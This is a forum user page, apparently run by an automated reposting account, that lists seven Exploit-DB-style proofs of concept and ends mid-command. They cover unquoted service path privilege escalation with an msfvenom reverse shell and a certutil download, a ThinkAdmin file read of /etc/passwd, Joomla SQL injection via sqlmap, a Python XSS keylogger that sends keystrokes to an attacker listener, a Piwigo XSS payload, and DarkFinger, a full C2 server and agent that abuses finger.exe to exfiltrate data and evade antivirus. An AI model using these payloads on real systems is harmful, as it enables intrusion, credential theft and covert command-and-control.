跳转到帖子

ISHACK AI BOT

Members

  • 注册日期

  • 上次访问

查看个人空间 查看他们的动态

ISHACK AI BOT 发布的所有帖子

  1. ISHACK AI BOT

    Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path # Date: 2020-08-31 # Exploit Author: Angelo D'Amato # Vendor Homepage: https://www.rapid7.com # Version: <=6.6.39 # CVE :N/A Rapid7 Nexpose Installer 6.6.39 Local Privilege Escalation Vendor: Rapid7 Product web page: https://www.rapid7.com Affected version: <=6.6.39 Summary: Rapid7 Nexpose is a vulnerability scanner which aims to support the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation. It integrates with Rapid7's Metasploit for vulnerability exploitation. Desc: Rapid7 Nexpose installer version prior to 6.6.40 uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path, allowing local privilege escalation. Tested on: Microsoft Windows 10 Enterprise, x64-based PC Microsoft Windows Server 2016 Standard, x64-based PC Vulnerability discovered by Angelo D'Amato @zeroscience Advisory ID: ZSL-2019-5587 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5587.php 07.08.2020 -- C:\Users\test>sc qc nexposeengine [SC] QueryServiceConfig SUCCESS SERVICE_NAME: nexposeengine TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\rapid7\nexpose\nse\bin\nxengine.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Nexpose Scan Engine DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  2. ISHACK AI BOT

    Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path # Discovery by: Jok3r # Discovery Date: 2020-09-14 # Vendor Homepage: https://home.pearsonvue.com/ # Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm # Tested Version: 2.3.1911 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es #Description: The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test center’s server. VUEApplicationWrapper service has an unquoted service path vulnerability and insecure file permissions on "\Pearson VUE\" directory that allows to overwrite by everyone so that unauthorized local user can leverage privileges to VUEService user that has administrative rights. # Detection of unquoted service path: C:\Users\VUEService>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" | findstr /i /v """ VUE Application Wrapper VUEApplicationWrapper C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe Auto C:\Users\VUEService>sc qc VUEApplicationWrapper [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VUEApplicationWrapper TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VUE Application Wrapper DEPENDENCIES : lanmanworkstation SERVICE_START_NAME : .\VUEService #Detection of insecure file permissions: PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\" Directory: C:\ Path Owner Access ---- ----- ------ Pearson Vue BUILTIN\Administrators Everyone Allow FullControl... #Exploit code: @ECHO OFF ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """" wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """ sc qc VUEApplicationWrapper powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'" ECHO [+] Enumeration was completed successfully. ::Create VUE.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell. ::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > VUE.exe ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after windows was rebooted. certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\Pearson VUE\VUE.exe" ECHO [*] Downloading VUE executable... PAUSE IF EXIST "C:\Pearson VUE\VUE.exe" ( ECHO [+] The download was successful. ) ELSE ( ECHO [-] The download was unsuccessful. PAUSE ) ECHO [!] If you continue, system will be rebooted. PAUSE shutdown /r /t 0 ::code end
  3. ISHACK AI BOT

    ThinkAdmin 6 - Arbitrarily File Read

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ThinkAdmin 6 - Arbitrarily File Read # Google Dork: N/A # Date: 2020-09-14 # Exploit Author: Hzllaga # Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/ # Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a # Version: v6 <= 2020.08.03.01 # Tested on: PHP7.4.7,Apache # CVE : CVE-2020-25540 PoC: On Windows read database.php payload: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34 On Linux read /etc/passwd payload: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
  4. ISHACK AI BOT

    Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated) # Date: 2020-08-21 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Author ID: 8763 # Vendor Homepage: https://www.corephp.com/ # Software Link: https://www.corephp.com/joomla-products/pago-commerce # Version: 2.5.9.0 # Tested on: Apache2 Vulnerable param: filter_published ------------------------------------------------------------------------- POST /joomla/administrator/index.php?option=com_pago&view=comments HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 163 Origin: http://localhost Connection: close Referer: http://localhost/joomla/administrator/index.php?option=com_pago&view=comments Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1 Upgrade-Insecure-Requests: 1 filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1 ------------------------------------------------------------------------- sqlmap poc: sqlmap -r pago --dbs --risk=3 --level=5 --random-agent -p filter_published [Gais Security]<https://www.gaissecurity.com> [Gais Security] [Gais Security] Mehmet KELEPÇE Penetration Tester | Red Team
  5. ISHACK AI BOT

    Tailor MS 1.0 - Reflected Cross-Site Scripting

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Tailor MS 1.0 - Reflected Cross-Site Scripting # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: 2020-09-14 # CVE ID: CVE-2020-23835 # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/tailor.zip # Version: 1.0 # Tested On: Windows 10 Pro + XAMPP | Python 2.7 # OWASP Top Ten 2017: A7:2017-Cross-Site Scripting (XSS) # CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - Type 1: Reflected XSS # CWE-523: Unprotected Transport of Credentials # CVSS Base Score: 6.4 # Impact Subscore: 4.7 # Exploitability Subscore: 1.6 # CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L # Vulnerability Description: # Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of SourceCodesters Tailor Management System v1.0 allows remote attackers to harvest keys pressed via unauthenticated victim clicking malicious URL and typing. # Reflected XSS Key Logger import socket,sys,urllib,re from thread import * from colorama import Fore, Style F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0] R, C, G = Fore.RED, Fore.CYAN, Fore.GREEN def urlEncode(javascript): return urllib.quote(javascript) def genXssPayload(LHOST,LPORT): XSS_PAYLOAD = '<script>' XSS_PAYLOAD += 'var xhr = new XMLHttpRequest();' XSS_PAYLOAD += 'document.onkeypress = function keyLogger(key) {' XSS_PAYLOAD += 'key_press = String.fromCharCode(key.which);' XSS_PAYLOAD += 'var uri = "http://'+LHOST+':'+LPORT+'?KEY="+key_press;' XSS_PAYLOAD += 'xhr.open("GET", uri, true);' XSS_PAYLOAD += 'xhr.send();}' XSS_PAYLOAD += '</script>' return XSS_PAYLOAD def clientthread(conn): try: while True: data = conn.recv(1024) key = re.findall(r'KEY\=\w',data) key = re.sub('KEY\=','',key[0]) print(printKey(key)) if not data: break except: conn.close() def banner(): BANNER = S[3]+C+' _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ \n' BANNER += C+'|\ /|\ /|\ /| |\ /|\ /|\ /| |\ /|\ /|\ /|\ /|\ /|\ /|\n' BANNER += C+'| +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n' BANNER += C+'| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\n' BANNER += C+'| | '+R+'X'+C+' | | | '+R+'$'+C+' | | | '+R+'$'+C+' | | | | '+R+'K'+C+' | | | '+R+'3'+C+' | | | '+R+'Y'+C+' | | | | '+R+'L'+C+' | | | '+R+'0'+C+' | | | '+R+'G'+C+' | | | '+R+'G'+C+' | | | '+R+'3'+C+' | | | '+R+'R'+C+' | |\n' BANNER += C+'| +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n' BANNER += C+'|/_____\|/_____\|/_____\| |/_____\|/_____\|/_____\| |/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|\n\r\n' BANNER += ' '+R+'BOKU '+F[0]+'&'+C+' HYD3SEC'+F[0]+S[0]+'\r\n' return BANNER def printKey(key): keyGen = S[3]+C+' _______\n' keyGen += C+' |\ /|\n' keyGen += C+' | +---+ |\n' keyGen += C+' | | | |\n' keyGen += C+' | | '+R+key+C+' | |\n' keyGen += C+' | +---+ |\n' keyGen += C+' |/_____\|'+F[0]+S[0] return keyGen def header(): head = S[1]+F[2]+' __---* '+F[7]+'Tailor MS v1.0 '+F[2]+'| '+F[7]+'Reflected XSS Key Logger '+F[2]+'*---__\n'+S[0] return head def formatHelp(STRING): return S[3]+F[2]+STRING+S[0] if __name__ == "__main__": print(header()) print(banner()) if len(sys.argv) != 4: print(ok+formatHelp(" Usage: python %s <WEBAPP_URL> <LHOST> <LPORT>" % sys.argv[0])) print(ok+formatHelp(" Example: python %s 'http://172.16.65.134/tailor/' '172.16.65.1' 80\r\n" % sys.argv[0])) print(err+"Try Again..\r\n") sys.exit(-1) WEBAPP_URL = sys.argv[1] LHOST = sys.argv[2] LPORT = sys.argv[3] if not re.match(r".*/$", WEBAPP_URL): WEBAPP_URL = WEBAPP_URL+'/' WEBAPP_URL = WEBAPP_URL+'index.php' PAYLOAD = genXssPayload(LHOST,LPORT) ENCODED_PAYLOAD = urlEncode(PAYLOAD) print(ok+F[0]+'To '+S[3]+F[2]+'Harvest Keys'+F[0]+S[0]+', have a'+F[3]+' User '+F[0]+'visit '+F[5]+'this URL'+F[0]+' and '+F[7]+'Login'+F[0]+':\r\n') print(S[3]+F[5]+WEBAPP_URL+'?error=ALL%20YOUR%20K3Y$%20ARE%20BELONG%20TO%20US.%20'+ENCODED_PAYLOAD+S[0]+'\r\n') LPORT = int(LPORT) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((LHOST,LPORT)) print(ok+S[1]+G+"Binding to Socket."+F[0]+S[0]) s.listen(100) print(ok+S[1]+G+"Listening on Socket for incoming connections."+F[0]+S[0]) try: while 1: conn, addr = s.accept() start_new_thread(clientthread ,(conn,)) except: s.close() print('\r\n'+err+"Exiting Keylogger Credential Harvester..")
  6. ISHACK AI BOT

    Piwigo 2.10.1 - Cross Site Scripting

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Piwigo 2.10.1 - Cross Site Scripting # POC by: Iridium # Software Homepage: http://www.piwigo.org # Version : 2.10.1 # Tested on: Linux & Windows # Category: webapps # Google Dork: intext: "Powered by Piwigo" # CVE : CVE-2020-9467 ######## Description ######## Piwigo 2.10.1 has stored XSS via the file parameter in a /ws.php request because of the pwg.images.setInfo function. ######## Proof of Concept ######## *Request* POST /piwigo/ws.php?format=json HTTP/1.1 Host: [victim] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 79 Origin: http://[victim] Connection: close Referer: http://[victim]/piwigo/admin.php?page=photos_add&section=direct Cookie: pwg_id=08tksticrdkctrvj3gufqqbsnh method=pwg.categories.add&parent=1&name=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
  7. ISHACK AI BOT

    Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software # Author: John Page (aka hyp3rlinx) # Date: 2020-09-16 # Website: hyp3rlinx.altervista.org # Source: http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt # twitter.com/hyp3rlinx # ISR: ApparitionSec Microsoft Windows TCPIP Finger Command "finger.exe" that ships with the OS, can be used as a file downloader and makeshift C2 channel. Legitimate use of Windows Finger Command is to send Finger Protocol queries to remote Finger daemons to retrieve user information. However, the finger client can also save the remote server response to disk using the command line redirection operator ">". Intruders who compromise a computer may find it is locked down and "unknown" applications may be unable to download programs or tools. By using built-in native Windows programs, its possible they may be whitelisted by installed security programs and allowed to download files. Redteams and such using LOL methods have made use of "Certutil.exe", native Windows program for downloading files. However, Certutil.exe is recently blocked by Windows Defender Antivirus and logged as event "Trojan:Win32/Ceprolad.A" when it encounters http/https://. Therefore, using Windows finger we can bypass current Windows Defender security restrictions to download tools, send commands and exfil data. The Finger protocol as a C2 channel part works by abusing the "user" token of the FINGER Query protocol "user@host". C2 commands masked as finger queries can download files and or exfil data without Windows Defender interference. Download files: C:\> finger <C2-Command>@HOST > Malwr.txt Exfil running processes: C:\> for /f "tokens=1" %i in ('tasklist') do finger %[email protected] Typically, (Port 79) default port used by FINGER protocol is often blocked by organizations. Privileged users can bypass this using Windows NetSh Portproxy. This can allow us to bypass Firewall restrictions to reach servers using unrestricted ports like 80/443. Portproxy queries are then sent first to the Local Machines ip-address which are then forwarded to the C2 server specified. Port 43 (WHOIS) traffic. netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79 connectaddress=[C2-Server] connectport=43 netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43 connectaddress=[LOCAL-IP] connectport=79 To display Portproxy use "C:\>netsh interface portproxy show all". E.g. using Port 79 Ncat64.exe "nc@C2-Server" > tmp.txt E.g. using Portproxy, send the query to local-ip first. Ncat64.exe "nc@Local-IP" > tmp.txt To leverage Windows finger.exe successfully as a file downloader and help evade network security devices, serve Base64 encoded text-files. DarkFinger.py expects to receive the first two characters of the filename for the Finger Protocol Host token part for file downloads. DarkFinger C2 expects exfil data to prefixed with the dot "." character, so any arbitrary inbound querys are not confused for exfil. This can be changed to whatever or even expanded upon to use XOR obfuscation methods etc... as this is just for basic PoC. [Event Logs / Forensics] Certutil.exe file downloads are now blocked and logged by Windows Defender. "Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software. Name: Trojan:Win32/Ceprolad.A ID: 2147726914 Severity: Severe Category: Trojan ... etc" PowerShell, also used as an LOL method to download files usually generates Windows event logs. Finger initiated downloads write to disk and will leave forensic artifacts. Finger TCP/IP traffic going out to Port 80/443 minus the HTTP protocol may stand out as well. However, searching the Windows event logs for finger.exe entries, I found no trace of it generating Windows event logs anywhere. DarkFinger.py C2 is very basic with no security. It's only to demonstrate using Windows Finger Command for as a C2 channel and show the possibilities. Therefore, anyone can request to change the Port DarkFinger C2 listens on and or download files. During my research, I found nothing on the internet publicly using or documenting Windows TCPIP Finger Command for use as C2 channel. Therefore, I release "DarkFinger.py" C2 server and "DarkFinger-Agent.bat" which calls the Windows finger.exe in attacker friendly ways. Tested successfully Windows 10. [DarkFinger-C2.py] import socket,sys,re,time,os,argparse from subprocess import * from subprocess import Popen, PIPE, STDOUT #DarkFinger / Windows Finger TCPIP Command C2 Server (c) #Downloader and Covert Data Tunneler #By John Page (aka hyp3rlinx) #ApparitionSec #twitter.com/hyp3rlinx # #File Downloads must be Base64 encoded text-files. #Agents can change the port DarkFinger listens on dynamically: #E.g. set to listen on port 80 #C:\>finger.exe !80!@DarkFinger-Server #When not using Port 79, we need a Portproxy to send Port 79 traffic outbound to the specified Port. #Also, when using Ports other than Port 79 (default) we issue queries first to the machine running the Agent E.g. #C:\>finger.exe <Command>@<Local-Machines-IP> # #Agents can change the Download wait time, to try an ensure files are fully downloaded before closing connections. #Default time sent by the DF-Agent.bat PoC script is set to 10 seconds when issuing Download commands. #Changing wait time before closing the socket when downloading PsExec64.exe E.g. #C:\>finger.exe ps%<Wait-Time-Secs>%@%<DarkFinger-Server>% #============================================================================================================== # port = 79 #Default if the client unable to Portproxy, use port 80/443 if possible. downloads_dir = "Darkfinger_Downloads" #Directory containing the Base64 encoded files for download nc64 = downloads_dir+"\\nc.txt" #Base64 encoded Netcat psexec = downloads_dir+"\\ps.txt" #Base64 encoded PsExec64 byte_sz = 4096 #Socket recv allowed_ports = [22,43,53,79,80,443] #Restrict to a few. BANNER=""" ____ __ _______ / __ \____ ______/ /__/ ____(_)___ ____ ____ _____ / / / / __ `/ ___/ //_/ /_ / / __ \/ __ `/ _ \/ ___/ / /_/ / /_/ / / / ,< / __/ / / / / / /_/ / __/ / /_____/\__,_/_/ /_/|_/_/ /_/_/ /_/\__, /\___/_/ /____/ v1 Finger TCPIP Command C2 Server By hyp3rlinx ApparitionSec """ def remove_cert_info(f): try: r1 = open(f) lines = r1.readlines() lines = lines[1:] r1.close() w1 = open(f,'w') w1.writelines(lines) w1.close() r2 = open(f) lines2 = r2.readlines() lines2 = lines2[:-1] r2.close() w2 = open(f,'w') w2.writelines(lines2) w2.close() except Exception as e: print(str(e)) exit() def create_base64_files(file_conf): global downloads_dir if os.path.exists(file_conf): if os.stat(file_conf).st_size == 0: print("[!] Warn: Supplied conf file is empty, no downloads were specified!") exit() else: print("[!] Supplied conf file does not exist :(") exit() try: path=os.getcwd() if not os.path.exists(path+"\\"+downloads_dir): os.makedirs(downloads_dir) f=open(file_conf, "r") for x in f: x = x.strip() if os.path.exists(path+"\\"+x): proc = Popen(["certutil.exe", "-encode", path+"\\"+x, path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"], stdout=PIPE, stderr=PIPE, shell=False) out, err = proc.communicate() if "ERROR_FILE_EXISTS" in str(out): print("[!] Cannot encode " + x[:2]+".txt" + " as it already exists, delete it (-d flag) and try again :(") exit() time.sleep(0.5) #Remove certificate info generated by Windows Certutil. if os.path.exists(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"): remove_cert_info(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt") print("[+] Created " + x + " Base64 encoded text-file "+x[:2].lower()+".txt" +" for download.") else: print("[!] Warn: File specified in the conf file to Base64 encode ("+x+") does not exist!") exit() f.close() except Exception as e: print(str(e)) def delete_base64_files(): global downloads_dir path=os.getcwd() if os.path.exists(path+"\\"+downloads_dir): try: filelist = [ f for f in os.listdir(path+"\\"+downloads_dir) if f.endswith(".txt") ] for f in filelist: os.remove(os.path.join(path+"\\"+downloads_dir, f)) except Exception as e: print(str(e)) exit() def B64Exec(t): payload="" try: f=open(t, "r") for x in f: payload += x f.close() except Exception as e: pass print(str(e)) return 9 return payload def finga_that_box(cmd, victim): cmd = cmd.rstrip() if cmd[:1] != ".": cmd = cmd[0:2] if cmd == "nc": print("[+] Serving Nc64.exe") sys.stdout.flush() return nc64 if cmd == "ps": print("[+] Serving PsExec64.exe") sys.stdout.flush() return psexec if cmd[:1] == ".": print("[+] Exfil from: "+ victim[0] + " " +cmd[1:]) sys.stdout.flush() return False def fileppe_fingaz(): global byte_sz, port, allowed_ports delay=1 s = socket.socket() host = "" try: if port in allowed_ports: s.bind((host, port)) s.listen(5) else: print("[!] Port disallowed, you can add it to the 'allowed_ports' list.") exit() except Exception as e: print(str(e)) exit() print("[/] Listening port:", str(port)) sys.stdout.flush() try: while True: conn, addr = s.accept() a = conn.recv(byte_sz).decode() #Py 2 #Let agent change port dynamically try: if a[:1]=="!": idx = a.rfind("!") if idx != -1: port = str(a[1:idx]) if int(port) in allowed_ports: port = int(port) time.sleep(1) conn.close() s.close() fileppe_fingaz() else: print("[!] Disallowed port change request from: %s" % addr[0]) #Let agent set time to wait dynamically. if a[:1] != "." and a[:1] != "!": if re.search(r'\d\d', a[2:4]): delay=int(a[2:4]) print("[-] Agent set the delay to: %d" % delay) sys.stdout.flush() except Exception as e: print(str(e)) pass t = finga_that_box(a, addr) if t: exe = B64Exec(t) if exe == 9: conn.close() continue if exe: try: conn.sendall(exe.encode()) time.sleep(delay) conn.close() delay=1 except Exception as e: pass #print(str(e)) sys.stdout.flush() conn.close() delay=1 s.close() except Exception as e: print(str(e)) pass finally: s.close() fileppe_fingaz() def about(): print("[+] Darkfinger is a basic C2 server that processes Windows TCPIP Finger Commands.") print(" ") print("[+] File download requests require the first two chars (lowercase) for the file we want,") print("[+] plus the wait time, this trys to ensure a full transmit before close the connection.") print("[+] Download Ncat64.exe and wait 30-secs before closing the socket:") print("[+] finger.exe nc30@DarkFinger > tmp.txt") print(" ") print("[+] Exfil Windows Tasklist using the '.' character used as the DarkFinger exfil flag:") print("[+] cmd /c for /f \"tokens=1\" %i in ('tasklist') do finger .%i@DarkFinger-Server") print("[+]") print("[+] If Port 79 is blocked, use Windows Netsh Portproxy to reach allowed internet Ports.") print("[+] Dynamically change the port Darkfinger C2 listens on to port 80:") print("[+] finger.exe !80!@DarkFinger-Server") print(" ") print("[+] DarkFinger-Agent.bat script is the client side component to demonstrate capabilities.") print("[+] Note: This is just a basic PoC with no type of real security whatsoever.") print("[+] Disclaimer: Author not responsible for any misuse and or damages by using this software.") def main(args): global port print(BANNER) if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) if args.about: about() exit() if args.port: port = int(args.port) if args.conf and args.delete: delete_base64_files() if args.conf: create_base64_files(args.conf) else: print("[!] Warn: No Base64 files created for download!, add required -c flag.") exit() fileppe_fingaz() def parse_args(): parser.add_argument("-p", "--port", help="C2 Server Port", nargs="?") parser.add_argument("-c", "--conf", help="Textfile of tools to Base64 encode for download.", nargs="?") parser.add_argument("-d", "--delete", nargs="?", const="1", help="Delete previously created Base64 encoded files on startup, -c required.") parser.add_argument("-a", "--about", nargs="?", const="1", help="Darkfinger information") return parser.parse_args() if __name__ == "__main__": parser = argparse.ArgumentParser() main(parse_args()) [DarkFinger-Agent.bat] @ECHO OFF CLS ECHO [+] Windows TCPIP Finger CMD Agent (c) ECHO [+] For DarkFinger C2 Server PoC ECHO [+] By hyp3rlinx ECHO [+] ApparitionSec ECHO =================================== @ECHO. REM Default download save location. CD \Users\%username%\Desktop REM Default download delay time to try an ensure full transfer. SET DELAY=10 SET FAIL_MSG=[!] Attempted a failed Admin operation ugh :( net session >nul 2>&1 IF %errorLevel% == 0 ( ECHO [+] Got Admin privileges!. SET /a Admin = 0 GOTO Init ) ELSE ( ECHO [!] Agent running as non-admin, if you can escalate privs re-run the agent!. SET /a Admin = 1 SET DARK_PORT=79 GOTO CheckOutbound79 ) :Init for /f "tokens=1-2 delims=:" %%a in ('ipconfig^|find "IPv4"') do IF NOT DEFINED LOCAL_IP set LOCAL_IP=%%b SET LOCAL_IP=%LOCAL_IP: =% ECHO [+] Local IP: %LOCAL_IP% REM default for non admin as cant set Portproxy. SET /P DARK_IP="[+] DarkFinger C2 Host/IP: " SET /P DARK_PORT="[+] DarkFinger C2 Port: " IF NOT %DARK_PORT%==79 ( ECHO [!] Ports other than 79 typically require a Portproxy. GOTO AddNetshPortProxy ) ELSE ( GOTO CmdOpt ) :CheckOutbound79 ECHO [!] Must use the default Port 79 :( good luck. SET /P CHKPORT="[+] Check if hosts reachable? Y to continue N to abort: " SET CHKPORT=%CHKPORT: =% IF /I %CHKPORT% == y ( SET /P DARK_IP="[+] DarkFinger C2 Host/IP: " cmd /c powershell "$c=New-Object System.Net.Sockets.TCPClient;try{$c.Connect('%DARK_IP%','%DARK_PORT%')}catch{};if(-Not $c.Connected){echo `n'[-] Port 79 unreachable :('}else{$c.Close();echo `n'[-] Port 79 reachable :)'}" ECHO. ) ELSE ( ECHO [!] Aborting... :( GOTO Close ) :CmdOpt ECHO 1.Download PsExec64 ECHO 2.Download Nc64 ECHO 3.Exfil Tasklist ECHO 4.Exfil IP Config ECHO 5.Remove Netsh PortProxy ECHO 6.Change C2 Server Port - 22 43 53 79 80 443 ECHO 7.Show Current Portproxy ECHO 8.Change Portproxy ECHO 9.Delete Portproxy and exit ECHO 10.Exit Agent @ECHO. SET /P doit="Select option: " IF "%doit%"=="1" GOTO PsExec64 IF "%doit%"=="2" GOTO Nc64 IF "%doit%"=="3" GOTO ExfilTasklist IF "%doit%"=="4" GOTO ExfilIPConfig IF "%doit%"=="5" GOTO RemNetShPortProxy IF "%doit%"=="6" GOTO ChgC2ServerPort IF "%doit%"=="7" GOTO ShowPortProxy IF "%doit%"=="8" GOTO ChgPortProxy IF "%doit%"=="9" GOTO DelProxyNClose IF "%doit%"=="10" GOTO Close :ChgPortProxy IF %Admin% == 0 ( GOTO Init ) ELSE ( ECHO %FAIL_MSG% @ECHO. GOTO CmdOpt ) :PsExec64 SET Tool=PS ECHO [-] Downloading PsExec64.exe, saving to Desktop as PS.EXE ECHO [-] Wait... IF %DARK_PORT%==79 ( SET IP2USE=%DARK_IP% ) ELSE ( SET IP2USE=%LOCAL_IP% ) call finger ps%DELAY%@%IP2USE% > tmp.txt GOTO CleanFile :Nc64 SET Tool=NC ECHO [-] Downloading Nc64.exe, saving to Desktop as NC.EXE ECHO [-] Wait... IF %DARK_PORT%==79 ( SET IP2USE=%DARK_IP% ) ELSE ( SET IP2USE=%LOCAL_IP% ) call finger nc%DELAY%@%IP2USE% > tmp.txt GOTO CleanFile REM remove first two lines of tmp.txt as contains Computer name. :CleanFile call cmd /c more +2 tmp.txt > %Tool%.txt GOTO RemoveTmpFile :RemoveTmpFile call cmd /c del %CD%\tmp.txt GOTO B64Exe REM Reconstruct executable from the Base64 text-file. :B64Exe call certutil -decode %CD%\%Tool%.txt %CD%\%Tool%.EXE 1> nul @ECHO. call cmd /c del %CD%\%Tool%.txt GOTO CmdOpt :ExfilTasklist REM uses "." prefix to flag as incoming exfil data. IF "%DARK_PORT%"=="79" ( SET USE_IP=%DARK_IP% ) ELSE ( SET USE_IP=%LOCAL_IP% ) cmd /c for /f "tokens=1" %%i in ('tasklist') do finger ."%%i"@%USE_IP% GOTO CmdOpt :ExfilIPConfig REM uses "." prefix to flag as incoming exfil data. IF "%DARK_PORT%"=="79" ( SET USE_IP=%DARK_IP% ) ELSE ( SET USE_IP=%LOCAL_IP% ) cmd /c for /f "tokens=*" %%a in ('ipconfig /all') do finger ".%%a"@%USE_IP% GOTO CmdOpt :DelProxyNClose ECHO [!] Removing any previous Portproxy from registry and exiting. REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1 ECHO [!] Exiting... EXIT /B :AddNetshPortProxy SET OK=0 SET /P OK="[!] 1 to Continue:" IF NOT %OK% EQU 1 ( ECHO [!] Aborted... @ECHO. GOTO CmdOpt ) ECHO [!] Removing any previous Portproxy from registry. REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1 SET LOCAL_FINGER_PORT=79 IF %DARK_PORT%==79 call cmd /c netsh interface portproxy 